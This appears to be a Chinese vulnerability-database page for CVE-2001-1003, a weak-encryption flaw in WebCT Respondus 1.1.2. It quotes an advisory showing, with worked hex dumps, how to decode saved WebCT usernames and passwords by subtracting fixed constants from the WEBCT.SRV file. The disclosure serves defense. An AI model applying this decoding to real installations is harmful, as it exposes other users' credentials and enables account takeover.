WebCT Respondus密码泄露和权限提升漏洞
漏洞ID | 1106474 | 漏洞类型 | 未知 |
发布时间 | 2001-08-23 | 更新时间 | 2001-08-31 |
CVE编号 | CVE-2001-1003 |
CNNVD-ID | CNNVD-200108-169 |
漏洞平台 | Multiple | CVSS评分 | 4.6 |
|漏洞来源
|漏洞详情
WebCT的Respondus1.1.2存储用户名和密码时使用弱加密,可以读取WEBCT.SVR文件的本地用户可以利用该漏洞译码并获取附加权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/3228/info
Respondus is an application designed to add functionality to WebCT's quiz, self-test and survey tools. WebCT is a commercial e-learning solution.
When a user opts to have Respondus remember the username/password for WebCT access, the information is saved encrypted in a file called 'WEBCT.SRV'. The encrypted value of the username and password are converted to their ASCII values and added to a constant. A hex editor can be used to compare differences between the file before credentials are saved with the version of the file after credentials are saved. The values of the username/password are determined by subtracting the constants in 'WEBCT.SRV' prior to saving the credentials from the new values.
The constants are the same for every version of Respondus and are easily located, which may allow the attacker to forego the step of comparing the old and new versions of 'WEBCT.SRV', if the constants are known.
Successful exploitation of this issue will allow the attacker to access other WebCT accounts, which may lead to elevated privileges or the disclosure of sensitive information.
C8-EF = userid
F0-117 = password
To see the password in plain text subtract the value shown in the WEBCT.SVR
file with no info saved from the value in the same position in the file
with the info saved. Stop when you reach the point where the values are
equal and the result is therefore 0.
i.e.
(the values after username is remembered:)
C8-EF 8B 88 7C 88 7A 7B 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12
(the constants:)
C8-EF 16 15 17 16 11 17 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12
75 73 65 72 69 64 0 <- stop
u s e r i d
(the values after the password is saved:)
F0-117 85 74 89 87 8E 84 83 7A 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10
(the constants:)
F0-117 15 13 16 14 17 15 11 16 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10
70 61 73 73 77 6F 72 64 0 <- stop
p a s s w o r d
|受影响的产品
WebCT Respondus 1.1.2
|参考资料
来源:BUGTRAQ
名称:20010823Respondusv1.1.2storespasswordsusingweakencryption
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=99859557930285&w;=2
相关推荐: Sendmail Socket Hijack Vulnerability
Sendmail Socket Hijack Vulnerability 漏洞ID 1104503 漏洞类型 Design Error 发布时间 1999-11-05 更新时间 1999-11-05 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666